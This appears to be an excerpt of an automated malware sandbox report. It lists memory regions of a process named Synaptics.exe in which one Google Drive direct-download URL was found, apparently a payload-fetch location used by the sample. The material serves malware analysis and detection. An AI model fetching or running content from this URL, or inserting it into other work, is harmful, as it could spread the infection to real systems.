                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZf?
                              Source: Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                              Source: Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaC
                              Source: Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadadpg
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadag
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadam
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadamg
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadar9
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadatZ
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcQ
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadceI
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.co
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500649438.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.407916229.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377175932.0000000005824000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                              Source: Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeX
                              Source: Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden(g
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden8d
                              Source: Synaptics.exe, 00000002.00000000.386889262.000000000F0EC000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428758581.000000000F0EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                              Source: Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadff
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg(
                              Source: Synaptics.exe, 00000002.00000002.501301876.0000000005907000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.409244131.0000000005907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgy
                              Source: Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421827465.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503455143.0000000007C47000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380825428.0000000007C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000002.00000000.408126624.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500942768.0000000005878000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377610647.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhT
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhV
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadio6
                              Source: Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion
                              Source: Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadit
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                              Source: Synaptics.exe, 00000002.00000000.375758362.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380635776.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.421289465.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.503286393.0000000007BDA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499159034.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.380432666.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.420417448.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.499334298.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.502983467.0000000007B51000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404802165.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000002.00000000.399185009.000000001DC52000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.519427749.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadje
                              Source: Synaptics.exe, 00000002.00000002.509241899.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.500972620.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.386622904.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.385676487.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428474579.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429136519.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.377752563.00000000058A2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508548531.000000000F047000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.508283526.000000000EFB2000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.388972837.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.429920646.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.387442165.000000000F1DB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.408309357.0000000005894000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.510071207.000000000F2DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.428663745.000000000F047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000002.00000002.499207022.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.404990941.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000000.375871197.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkR
